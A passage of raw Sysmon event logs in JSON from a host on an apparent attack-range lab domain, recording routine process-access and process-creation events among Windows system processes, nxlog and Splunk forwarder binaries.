C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:23.799","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3076,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:23.799\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:23.799","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3077,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:23.799\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:23.799","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3078,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:23.799\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-10EB-5F25-0000-0010F73D0500}\r\nTargetProcessId: 4504\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:23.799","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-10EB-5F25-0000-0010F73D0500}","TargetProcessId":"4504","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3079,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:23.924\r\nSourceProcessGUID: {E2A3D6B1-10EB-5F25-0000-0010F73D0500}\r\nSourceProcessId: 4504\r\nSourceThreadId: 3868\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:23.924","SourceProcessGUID":"{E2A3D6B1-10EB-5F25-0000-0010F73D0500}","SourceProcessId":"4504","SourceThreadId":"3868","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3080,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:24.378\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:24.378","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3081,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:24.504\r\nProcessGuid: {E2A3D6B1-10EC-5F25-0000-0010AF3F0500}\r\nProcessId: 2692\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:24.504","ProcessGuid":"{E2A3D6B1-10EC-5F25-0000-0010AF3F0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:51:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3082,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:24.503\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 4028\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-10EC-5F25-0000-0010AF3F0500}\r\nTargetProcessId: 2692\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:24.503","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"4028","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-10EC-5F25-0000-0010AF3F0500}","TargetProcessId":"2692","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3083,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:24.503\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-10EC-5F25-0000-0010AF3F0500}\r\nTargetProcessId: 2692\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:24.503","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-10EC-5F25-0000-0010AF3F0500}","TargetProcessId":"2692","TargetImage":"C:\\Program 